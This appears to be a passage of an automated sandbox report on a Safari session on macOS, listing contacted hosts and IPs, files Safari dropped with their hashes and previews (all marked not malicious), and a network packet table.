                                                                                                                                                                                                                      jsdelivr.map.fastly.netUnited States
                                                                                                                                                                                                                      54113FASTLYUSfalse
                                                                                                                                                                                                                      104.17.24.14
                                                                                                                                                                                                                      cdnjs.cloudflare.comUnited States
                                                                                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                      104.18.95.41
                                                                                                                                                                                                                      challenges.cloudflare.comUnited States
                                                                                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                      104.21.59.250
                                                                                                                                                                                                                      newscorp.wtranovations.comUnited States
                                                                                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                      151.101.3.6
                                                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                                                      54113FASTLYUSfalse
                                                                                                                                                                                                                      172.66.42.211
                                                                                                                                                                                                                      cdn4.iconfinder.comUnited States
                                                                                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                      151.101.195.6
                                                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                                                      54113FASTLYUSfalse
                                                                                                                                                                                                                      23.44.104.237
                                                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                                                      16625AKAMAI-ASUSfalse
                                                                                                                                                                                                                      No context
                                                                                                                                                                                                                      No context
                                                                                                                                                                                                                      No context
                                                                                                                                                                                                                      No context
                                                                                                                                                                                                                      No context
                                                                                                                                                                                                                      Process:/Applications/Safari.app/Contents/MacOS/Safari
                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):61
                                                                                                                                                                                                                      Entropy (8bit):4.877218280079438
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:tQIVMofQyMq+bOvVj1WOv:ioMo2iOA
                                                                                                                                                                                                                      MD5:E1C26995DE8989690BDDE44D02C94738
                                                                                                                                                                                                                      SHA1:CFA0342BA5D23EB3FD27F0E1B4CFE545532F840A
                                                                                                                                                                                                                      SHA-256:07745736F8188E18D74A3197D6D39866273003C4B5969B4011A392F3B9A9FD95
                                                                                                                                                                                                                      SHA-512:2FA17EECE0A17B22E6888F34E202903AAADE4FC8CAE539C19CDAD56940A5312332D9195026CEA92653E5B495B8896034D6B5ACCEDE937E8E224C45357710EF89
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview:2025-03-21 09:28:55.134 Safari[610:4761] ApplePersistence=NO.
                                                                                                                                                                                                                      Process:/Applications/Safari.app/Contents/MacOS/Safari
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):19328
                                                                                                                                                                                                                      Entropy (8bit):2.9753497322131066
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:XVlGq37NZFFFF/QQQQgdFSGXFFFFnQQQQ:uq37HFFFF/QQQQg3SGXFFFFnQQQQ
                                                                                                                                                                                                                      MD5:1D8E1388683DC96ED97907EFCCE83FDA
                                                                                                                                                                                                                      SHA1:561FDF03A98032BAAEB7BC214FD6FC2712BA42B0
                                                                                                                                                                                                                      SHA-256:A6BE2B32F120066646A50B537477F2D359D7013851F123146CB9B6A7A1371E8C
                                                                                                                                                                                                                      SHA-512:70A1E99DAD32B200EB26AD78E6433B3E9E052355ADA3A3AD1CB6C644C1A0513E593CCD89EF8B9B305013B37F3F850F049D787677878F412D23FB517147C18C98
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview:.............J..dJ......clti....0.......mlti........0...blti....2.......blti....2...H...blti....2...|...blti....2.......blti....2.......blti....2.......blti....2...L...blti~...2.......5lti.@..,.......5lti.B..,....$..5lti.p..,.......5lti.D..,...87..................(....................................... .....................~...f... ...!............... ...4...3.......>.......U.......F...E...G...C...J...K...I...H...L...M...N.......O...?...9...P.......!............. .......t............."...........................................................#...............................^.......X...Y...Z...[...\...].......Q...........S.......R...............$.......(...%.......................&...'........... ...*...+...,...-.......5......./...0...1...6...7...8...:...4...3...........2...<...........T...;...=...>.......)...U...V...W.......@...A...B...F...E...G...C...D...J...K...I...H...L...M...N.......O...?.......9...P.......!...............j...X.....R...........%...7...........\.........".........
                                                                                                                                                                                                                      Process:/Applications/Safari.app/Contents/MacOS/Safari
                                                                                                                                                                                                                      File Type:Mac OS X Keychain File
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):48908
                                                                                                                                                                                                                      Entropy (8bit):3.533814637805397
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:xSMdGleGkIG7FF3theSMVXBD0tgcNrGB5pBfbouR6/chQOnGqwc2U+v+h/:8MdGleOhpBouRwchQOnGqwc2U+v+h/
                                                                                                                                                                                                                      MD5:0E4A0D1CEB2AF6F0F8D0167CE77BE2D3
                                                                                                                                                                                                                      SHA1:414BA4C1DC5FC8BF53D550E296FD6F5AD669918C
                                                                                                                                                                                                                      SHA-256:CCA093BCFC65E25DD77C849866E110DF72526DFFBE29D76E11E29C7D888A4030
                                                                                                                                                                                                                      SHA-512:1DC5282D27C49A4B6F921BA5DFC88B8C1D32289DF00DD866F9AC6669A5A8D99AFEDA614BFFC7CF61A44375AE73E09CD52606B443B63636977C9CD2EF4FA68A20
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview:kych...........................`...X...p..S0..SX..Th..T...T...[...^h...........L...X...............T...........d...................t...............t...........<...............P...........0...........$...p...........l...........X.......@.......................!...%........CSSM_DL_DB_SCHEMA_INFO.....D.......................!...%........CSSM_DL_DB_SCHEMA_ATTRIBUTES...D.......................!...%........CSSM_DL_DB_SCHEMA_INDEXES......H.......................!...%....... CSSM_DL_DB_SCHEMA_PARSING_MODULE...D.......................!...%@.......MDS_CDSADIR_CSSM_RECORDTYPE....D.......................!...%@.......MDS_CDSADIR_KRMM_RECORDTYPE....D.......................!...%@.......MDS_CDSADIR_EMM_RECORDTYPE.....L.......................!...%@......"MDS_CDSADIR_EMM_PRIMARY_RECORDTYPE.....H.......................!...%@.......MDS_CDSADIR_COMMON_RECORDTYPE......L.......................!...%@......"MDS_CDSADIR_CSP_PRIMARY_RECORDTYPE.....P.......................!...%@......%MDS_CDSADIR_CSP_CAPABILITY_R
                                                                                                                                                                                                                      Process:/Applications/Safari.app/Contents/MacOS/Safari
                                                                                                                                                                                                                      File Type:Mac OS X Keychain File
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):4404
                                                                                                                                                                                                                      Entropy (8bit):3.5110922853353324
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:mFkXs98w/mBr53CEb9ujBbCYoVeA7uBEUMy733Ka2VCneWHrUZRJkWnJI4FNMOQS:m6Xsh+CLjL3Pe3T5FFEfEn8xiYuuSsS
                                                                                                                                                                                                                      MD5:D3A1859E6EC593505CC882E6DEF48FC8
                                                                                                                                                                                                                      SHA1:F8E6728E3E9DE477A75706FAA95CEAD9CE13CB32
                                                                                                                                                                                                                      SHA-256:3EBAFA97782204A4A1D75CFEC22E15FCDEAB45B65BAB3B3E65508707E034A16C
                                                                                                                                                                                                                      SHA-512:EA2A749B105759EA33408186B417359DEFFB4A3A5ED0533CB26B459C16BB3524D67EDE5C9CF0D5098921C0C0A9313FB9C2672F1E5BA48810EDA548FA3209E818
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview:kych.......................................d...................0...............0...p...........@...@.......................!...%........CSSM_DL_DB_SCHEMA_INFO.....D.......................!...%........CSSM_DL_DB_SCHEMA_ATTRIBUTES...D.......................!...%........CSSM_DL_DB_SCHEMA_INDEXES......H.......................!...%....... CSSM_DL_DB_SCHEMA_PARSING_MODULE...@.......................!...%@.......MDS_OBJECT_RECORDTYPE..............h........... ...`........... ...@.......................-...1...5...9...=@..............................X...............P................... ...p...........l...........d...........P...........H...........,...............h...........P.......................1...5...9...=.......M................RelationID.........P.......................1...5...9...=.......M................RelationName.......P.......................1...5...9...=.......M................RelationID.........P.......................1...5...9...=.......M................AttributeID........X....
                                                                                                                                                                                                                      Process:/Applications/Safari.app/Contents/MacOS/Safari
                                                                                                                                                                                                                      File Type:Apple binary property list
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):78076
                                                                                                                                                                                                                      Entropy (8bit):6.254213413000523
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:QdfFOG6WhAakZtdmhvtMyDhWNQPOhFtGq5oH38O9P:MfzAakzdmltPgNbcq6M0P
                                                                                                                                                                                                                      MD5:2F5AEC56286756508A2C5F4DA687D321
                                                                                                                                                                                                                      SHA1:93980BD4C2C84E648C341302CFD7F4625EE426B3
                                                                                                                                                                                                                      SHA-256:A061D61C0F58F30F4A78E777BEC8E8ADD4F22853DFECC04DC790CE14264505F6
                                                                                                                                                                                                                      SHA-512:5B6EBEBCBD7DFE87C3A3611C1798B86424993F54FF4E84F594FAE5A6E621C7BCC2AC3148D5D336BBE76AC703FD8EE6AA82E7402DB333C3224A554E7FE08F4941
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview:bplist00............................r.....Q.............._..PasswordGenerationRequirements_..AppIDsToDomainsAssociations_.;DomainsKnownToDoSameDocumentNavigationInTextEditingCallback_..ChangePasswordURLs_. DomainsWithAssociatedCredentials_..DomainsForPasskeyFallbackUI_.$DomainsIneligibleForStreamlinedLogin]SharedDomains_."DomainsIneligibleForAutomaticLogin_.BDomainsThatWhenEmbeddedAsThirdPartyAskForPasswordsForOtherServices_..DomainsIneligibleForPasskeys_..DomainsToConsiderIdentical...>..................................... .!.".#.$.%.&.'.(.).*.+.,.-.../.0.1.2.3.4.5.6.7.8.9.:.;.<.=.>.?.@.A.B.C.D.E.F.G.H.I.J.K.L.M.N.O.P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].^._.`.a.b.c.d.e.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v.w.x.y.z.{.|.}.~...........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                      Process:/Applications/Safari.app/Contents/MacOS/Safari
                                                                                                                                                                                                                      File Type:Apple binary property list
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1959
                                                                                                                                                                                                                      Entropy (8bit):7.44876896079117
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:E3NmrS5ZTlg9rc1xTeLTjngOsWQIYjh6pUPjpos:zuArcjCPjnSh7PjpD
                                                                                                                                                                                                                      MD5:DFAF82830688F386555009988228D0E5
                                                                                                                                                                                                                      SHA1:ED893E27CCF878E03FA3E13915AD2C64C3C866A4
                                                                                                                                                                                                                      SHA-256:BE3F2F580D10DB4C59A76EA604CA2D393D9E97520D4B46EF641F0D8DF25705E7
                                                                                                                                                                                                                      SHA-512:059D468B428C2E53CF9F3FC008D4FF875678346746044DE501DE0B1E498283A028FEBA8C5A5661739E1827E1FBF149AC3636B8FB085557551B746D2FBFE377F5
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview:bplist00.....^SessionVersion^SessionWindowsS1.0............................9_..SelectedTabIndex\TabBarHiddenZDateClosed_..FavoritesBarHidden]IsPopupWindow_. PrefersReadingListSidebarVisible\Miniaturized_..WindowStateVersionZWindowUUID_..WindowContentRectYTabStates_..IsPrivateWindow_..SelectedPinnedTabIndex...3A..........S2.0_.$3CDB08FE-C0B4-4132-AFC2-B418C0BE68E2_..{{0, 49}, {1024, 696}}.... !."#.$%&'()*.,-...0123456.\IsDisposable\SessionState_..AncestorTabIdentifers_..SessionStateIsEncryptedXTabIndex]LastVisitTimeWTabUUIDVTabURL]TabIdentifierXTabTitle_..ProcessIdentifierWIsMuted.O....L....q..t.....#....s.....d......w)*.\d.L.z...o..U&....!(.sE......M.....Bl......).*z*=*9.qJ..?...s.......7.|.2.<.b^..B.px..2..lt......mvZ.8...X.(....5.x..>;.T=..../.j......'..;.>~...{:.^...Zs.YsC..V>2....:-...^Z..:.6.Q`.S.,.G.....,*.@.Eq?.~.....X.CL.#..4.%P...u..2Q..F4`.>L...t(h.P,p.X.......mU..FuX..Q...5....u...j...\.%.=Z..8....~.K~m.W],y1f-. 1l.2o.Q.\..0.....!....|.J...8|.c...!...a.h
                                                                                                                                                                                                                      Process:/Applications/Safari.app/Contents/MacOS/Safari
                                                                                                                                                                                                                      File Type:Apple binary property list
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):113
                                                                                                                                                                                                                      Entropy (8bit):4.399826831378072
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:NsmsLtAWpWa2MHn5zAWpW/SetTtoltT:NxqAK2MZzAPltTt4Z
                                                                                                                                                                                                                      MD5:1673BA923A358FA85F3217FA7C9E16D6
                                                                                                                                                                                                                      SHA1:A67D3283513080800DD798ED3603FBADA1BE9CD8
                                                                                                                                                                                                                      SHA-256:84D6CD3AA0AE689AF09AE68C18E2DB79BBB9AA987D572678B62FDB4F356A7178
                                                                                                                                                                                                                      SHA-512:24FE8E24E66440BE926682B81F4DA604C37B93E2D90999953F5BA9C35B8CC88163B497FC77D6018B46EB70E422975626164640E4A9CAB0469F0E1900BCA4319C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview:bplist00....._..OpenSearchDescriptions_.!WebsiteSpecificSearchDescriptions....&JK...............................L
                                                                                                                                                                                                                      Process:/Applications/Safari.app/Contents/MacOS/Safari
                                                                                                                                                                                                                      File Type:Apple binary property list
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):111
                                                                                                                                                                                                                      Entropy (8bit):4.497473103500974
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:NsmoyyODAXuGAW665DAXuGAHfyXl/NtoltV:Nxoo7Gj57G86XtNt4f
                                                                                                                                                                                                                      MD5:A52EA796C85C81502845C14BBF6A934C
                                                                                                                                                                                                                      SHA1:2188E8AA5C6F49DF71545AE776286FB50398F2EC
                                                                                                                                                                                                                      SHA-256:F2904D42E87C5B100913976C76E123252C8889996A561B5BFF32AAF49E3B4B1D
                                                                                                                                                                                                                      SHA-512:EDD17BA654E59D5EEAB2534BC93C9A065FBB177ECC490C3554A9C2A2341DC7C9F275CD3567E6E46E10F53CAFF86FCFE8E9240F431B19E91F9083FD7621EE595D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview:bplist00....._..MapOfHostnamesToZoomPreferences_..ZoomPreferenceVersion.Q1../GH...............................J
                                                                                                                                                                                                                      Process:/Applications/Safari.app/Contents/MacOS/Safari
                                                                                                                                                                                                                      File Type:Apple binary property list
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):169
                                                                                                                                                                                                                      Entropy (8bit):4.270212466516436
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:Nsm4nJNsGRbDJNsGM1aN7btoltwVCWfn6NJNsGRbgBD//NtG:NxeJ+gINaN3t4mwWfncJ+xFNtG
                                                                                                                                                                                                                      MD5:19B683903D35B989BCAF314A45A3474A
                                                                                                                                                                                                                      SHA1:6A04BF25ED848936CF8B0A662180A264BB094781
                                                                                                                                                                                                                      SHA-256:B70B31217BA8C56F3C700448B26A4901C60304E02D6EADAF88B2E2DD160955E4
                                                                                                                                                                                                                      SHA-512:5F21D0DFADD3B84FD0890C43BDD43BB68DACB3CEAA393751337D24948B6EDB6A1F938C721D85E0EB4BEDB935D247B2C56674882AF3F0925186560B0ED37812A7
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview:bplist00....._..TemplateIconCacheVersion]TemplateIcons.....(68...............................9bplist00..._..TemplateIconCacheVersion....&...............................(
                                                                                                                                                                                                                      Process:/Applications/Safari.app/Contents/MacOS/Safari
                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1012
                                                                                                                                                                                                                      Entropy (8bit):5.286991847916908
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:2dfyiwHuG5Ku3hu65juqVrTrmuGoTxR1F1xW:cfyP5Z/5PrUon1F1xW
                                                                                                                                                                                                                      MD5:0C29425555C7FF0CA114B1FD0DC39C50
                                                                                                                                                                                                                      SHA1:D7D808E8BE92462F4C3CEBA66734F0E9BB26ACDD
                                                                                                                                                                                                                      SHA-256:52826AFEEC974BB7BACB85BDC01DC4F23BF917D65E04773D7CAD393F7866F3FD
                                                                                                                                                                                                                      SHA-512:D9C8364A85F4B4A96CAAC1409F32F9D6B2F8AE19201E0ABD2D449A3EEDADD471E99E44BC92DEB5D8FB60287DA64A88E61B45F759E7B9A383A9BBE5F5FD242F95
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>SingleDeviceSaveChangesThrottlingPolicy</key>..<string>1:1440</string>..<key>MultipleDeviceSaveChangesThrottlingPolicy</key>..<string>50:1 | 10:2 | 10:5 | 10:30 | 9:40 | 1:510</string>..<key>SingleDeviceFetchChangesThrottlingPolicy</key>..<string>11:15 | 1:1275</string>..<key>MultipleDeviceFetchChangesThrottlingPolicy</key>..<string>50:1 | 50:3 | 20:4 | 20:5 | 20:15 | 20:18 | 20:20</string>..<key>SyncCircleSizeRetrievalThrottlingPolicy</key>..<string>1:1440</string>..<key>MaximumRequestLimitCharacterCount</key>..<integer>100000</integer>..<key>SyncWindow</key>..<real>1209600</real>..<key>HistoryModificationIdleDelayBeforeSyncAttemptKey</key>..<integer>90</integer>..<key>HistoryRemovalIdleDelayBeforeSyncAttempt</key>..<integer>6</integer>..<key>SaveChangesBeforeTerminationTimeout</key>..<integer>1</integer>.</dic
                                                                                                                                                                                                                      Process:/Applications/Safari.app/Contents/MacOS/Safari
                                                                                                                                                                                                                      File Type:Apple binary property list
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2890
                                                                                                                                                                                                                      Entropy (8bit):6.383267531551876
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:FMO+0F/o0CCPb/bCCoumzC6kiaR/wN4Gfhb0NegHI5mP0waijwg+tiEe:FMO+EoOfjovzCuv5I12msjtHe
                                                                                                                                                                                                                      MD5:99707B6E8B1DAA434DE2A176A458F85C
                                                                                                                                                                                                                      SHA1:96324F62483DD7AC8683D1850D694BB900EB3419
                                                                                                                                                                                                                      SHA-256:F282D8A52BFDCD208792A47C074E59A1E16D627D53094E11FC73E595AEC7DDAD
                                                                                                                                                                                                                      SHA-512:E8018018F91A5CE5C418F5C6445DC11A44B40AA6F619958D496B18507B3FE309415BF9AB293E9C7C0B3E4BA109213D0216D39C0304A7BC3CCE301DB0A729430C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview:bplist00..=..........!$'*-0369<?BEHKNPRTWZ]`cfilnqtwz}......................._..Bundle Identifier_..Developer Identifier_..com.ci.LetyShopsZ8SY8U2YJ38....._..com.stopallads.stopalladssafariZW5672G9B78....._..com.ci.MyPointsScoreZPV79DKGW8E....._..com.shopicks.safariZ52637H29AM....._..com.mallforafrica.mfaZW67LVM7587....._..com.ci.FatWalletExpressZMUA2CU723E....._..com.ci.CashrewardsZWPDLU326V5....._..com.ci.ObybSecurityZ284W368NRK.....^com.ci.AmikashZP77C556755.... _..com.ci.ShopBackCashbackButtonZ63768R85VC..."#_..com.skaggivara.UniblockZ9ZWDNJ5X28...%&_..com.pcvark.adblockerZRQA86TX865...()_..com.ci.PrescritZDPQ487PKR3...+,^com.ci.CashBagZWPHQAS3C45..../_..com.betteradvertising.ghosteryZHPY23A294X...12_..com.ci.RotaryGumdropZ24MGUH34FU...45_..com.ci.DeippiesnlSpaarhulpZH8MVFTTJJ3...78_..com.ci.Rewards4RacingZL6C8C726SQ...:;_..com.findx.privacycontrolZ5QE6FTCMP9...=>_..com.ci.ShopandGivereminderZ5KWKJVWBTS...@A_..com.el1t.uBlockZ3NU33NW2M3...CD_..com.ci.DealDoktorZN64U5Y52L6...FG_.(co
                                                                                                                                                                                                                      Process:/Applications/Safari.app/Contents/MacOS/Safari
                                                                                                                                                                                                                      File Type:Apple binary property list
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1959
                                                                                                                                                                                                                      Entropy (8bit):7.439399014220823
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:E3NmrD5ZTlg9zJt5Pm44WroOVMh3kFTygX6Yjh6pUPjpos:znANt5PD4WroblkV53h7PjpD
                                                                                                                                                                                                                      MD5:C331DBD1A86B066E0AF51E4D96B345BB
                                                                                                                                                                                                                      SHA1:568701AC40F84D5164A80097C8D68AF2B58D1846
                                                                                                                                                                                                                      SHA-256:FD03ECF971266BB72081AC45C6C057DD502422016550E413BE25EFB3BE0CC6F0
                                                                                                                                                                                                                      SHA-512:051CC29B8EDE43F0AE83551795A4AF3A447A43EEC46BD9473B5E621D7114E0E8568187E5A9E62292652F81112D6AFE3F0A59E6F38E5869F47CE20369CAA29479
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview:bplist00.....^SessionVersion^SessionWindowsS1.0............................9_..SelectedTabIndex\TabBarHiddenZDateClosed_..FavoritesBarHidden]IsPopupWindow_. PrefersReadingListSidebarVisible\Miniaturized_..WindowStateVersionZWindowUUID_..WindowContentRectYTabStates_..IsPrivateWindow_..SelectedPinnedTabIndex...3A.../......S2.0_.$3CDB08FE-C0B4-4132-AFC2-B418C0BE68E2_..{{0, 49}, {1024, 696}}.... !."#.$%&'()*.,-...0123456.\IsDisposable\SessionState_..AncestorTabIdentifers_..SessionStateIsEncryptedXTabIndex]LastVisitTimeWTabUUIDVTabURL]TabIdentifierXTabTitle_..ProcessIdentifierWIsMuted.O...p.h...M......)2x.q/.....UZ.............w.QFU....&K... .......1..D.......~..r...>......i*G.b...cE.%.M.>\.....>g..d...w....G..7y.E.H.i..(....C..{.K.#...>^.S...I....8.N6..T...o ...IU*o.!.._lQ.U.s..U...U...K7.A).9..6.....~,..*...7p.l....1.[9w.....eh....!..T..!..~P.Y.b..2~.gZ.+E}c..Ps...M..l. xZ.k$).....i*=.c*g.1...u...t...).@.9?C.YR.....r=... 6mv......N:@.*..b.a.K.(}..[..q.w...n..r;.
                                                                                                                                                                                                                      Process:/Applications/Safari.app/Contents/MacOS/Safari
                                                                                                                                                                                                                      File Type:Apple binary property list
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):76
                                                                                                                                                                                                                      Entropy (8bit):3.9370658315190226
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:N1n6qMvRGNMTAnd/t1tH:N1nleRaMTAltH
                                                                                                                                                                                                                      MD5:CDC65B5F112547EAFAE0F16F9C149426
                                                                                                                                                                                                                      SHA1:AEAF9908A5B6FF3E2F7B738ABF5FE9E79108BA01
                                                                                                                                                                                                                      SHA-256:1C6D085D871A855CE4A3902BAB4B9B92631B8EE8F0B7F6536768A2AAF427B45C
                                                                                                                                                                                                                      SHA-512:E8B0E4CE6A760A718A19976D3CFE9063F04FB4BF179947AECA84E94C83F21459FB9DC0FFABEA8F633BD2D0BA94FE1E15D8C97E9604FDE8BD0DEA961EB83BDDB7
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview:bplist00..._..ExtensionArchivesExtracted...(...............................)
                                                                                                                                                                                                                      Process:/Applications/Safari.app/Contents/MacOS/Safari
                                                                                                                                                                                                                      File Type:Apple binary property list
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):860
                                                                                                                                                                                                                      Entropy (8bit):5.915037477421211
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:ieuslRs6o7xIdVPVVfRX7f/jQ7OPJdVDbN8fRUJBTGFY80rHxYipSncQ7nmZ1Fym:l9RsHyVXxzjQ7OlDD8b0jRpScsyUyp
                                                                                                                                                                                                                      MD5:5357EE0E0570B2455C63F9D426DB1E1C
                                                                                                                                                                                                                      SHA1:CB137E024F3D37FF7573CD3046F7063A5E57ED71
                                                                                                                                                                                                                      SHA-256:80C8B8919BD8DC88E0FD68579A3DFB97A95C931502D96490D7D6A45EB99D9172
                                                                                                                                                                                                                      SHA-512:946DE511CDF7D19BC42850CCD5397BA67466E84483599C0CD765652A921FC9E4441EA6DB60A65652C0D284DB4F7C024BD0D7356F7A6DF59FE0BF8448D54002FB
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview:bplist00......89:XTopSites_..DisplayedSitesLastModifiedYDemoSites_..BannedURLStrings....... $(,04....._..TopSiteIsBuiltIn_..TopSiteURLString._."http://www.apple.com/uk/startpage/.......\TopSiteTitle._..https://www.icloud.com/ViCloud........_..https://www.yahoo.com/UYahoo........_..https://www.bing.com/TBing........_.4https://www.google.com/?client=safari&channel=mac_bmVGoogle........_..https://www.wikipedia.org/YWikipedia....."#._..https://www.facebook.com/XFacebook.....&'._..https://twitter.com/WTwitter.....*+._..https://www.linkedin.com/XLinkedIn....../._..https://www.weather.com/_..The Weather Channel.....23._..https://www.yelp.com/TYelp.....67._..https://www.tripadvisor.com/[TripAdvisor3A....t..........7.A.T.a.f.y............................./.4.;.<.s.z.............................!.*.1.2.M.c.j.k...............................;................
                                                                                                                                                                                                                      No static file info

                                                                                                                                                                                                                      Download Network PCAP: filteredfull

                                                                                                                                                                                                                      • Total Packets: 987
                                                                                                                                                                                                                      • 443 (HTTPS)
                                                                                                                                                                                                                      • 80 (HTTP)
                                                                                                                                                                                                                      • 53 (DNS)
                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                      Mar 21, 2025 15:28:52.903553009 CET44349352151.101.195.6192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:28:52.904432058 CET49352443192.168.11.12151.101.195.6
                                                                                                                                                                                                                      Mar 21, 2025 15:28:52.905189037 CET49352443192.168.11.12151.101.195.6
                                                                                                                                                                                                                      Mar 21, 2025 15:28:52.977771044 CET49348443192.168.11.1217.248.200.64
                                                                                                                                                                                                                      Mar 21, 2025 15:28:52.977931976 CET49348443192.168.11.1217.248.200.64
                                                                                                                                                                                                                      Mar 21, 2025 15:28:52.977986097 CET49348443192.168.11.1217.248.200.64
                                                                                                                                                                                                                      Mar 21, 2025 15:28:52.978281021 CET49348443192.168.11.1217.248.200.64
                                                                                                                                                                                                                      Mar 21, 2025 15:28:52.978554010 CET49348443192.168.11.1217.248.200.64
                                                                                                                                                                                                                      Mar 21, 2025 15:28:53.018809080 CET44349352151.101.195.6192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:28:53.020297050 CET44349352151.101.195.6192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:28:53.020313025 CET44349352151.101.195.6192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:28:53.020323038 CET44349352151.101.195.6192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:28:53.020333052 CET44349352151.101.195.6192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:28:53.021069050 CET49352443192.168.11.12151.101.195.6
                                                                                                                                                                                                                      Mar 21, 2025 15:28:53.021092892 CET49352443192.168.11.12151.101.195.6
                                                                                                                                                                                                                      Mar 21, 2025 15:28:53.021390915 CET49352443192.168.11.12151.101.195.6
                                                                                                                                                                                                                      Mar 21, 2025 15:28:53.026963949 CET49352443192.168.11.12151.101.195.6
                                                                                                                                                                                                                      Mar 21, 2025 15:28:53.037753105 CET49353443192.168.11.12151.101.195.6
                                                                                                                                                                                                                      Mar 21, 2025 15:28:53.091897964 CET4434934817.248.200.64192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:28:53.091942072 CET4434934817.248.200.64192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:28:53.092318058 CET4434934817.248.200.64192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:28:53.093027115 CET4434934817.248.200.64192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:28:53.093283892 CET4434934817.248.200.64192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:28:53.093324900 CET4434934817.248.200.64192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:28:53.093353033 CET4434934817.248.200.64192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:28:53.093697071 CET49348443192.168.11.1217.248.200.64
                                                                                                                                                                                                                      Mar 21, 2025 15:28:53.094192028 CET49348443192.168.11.1217.248.200.64
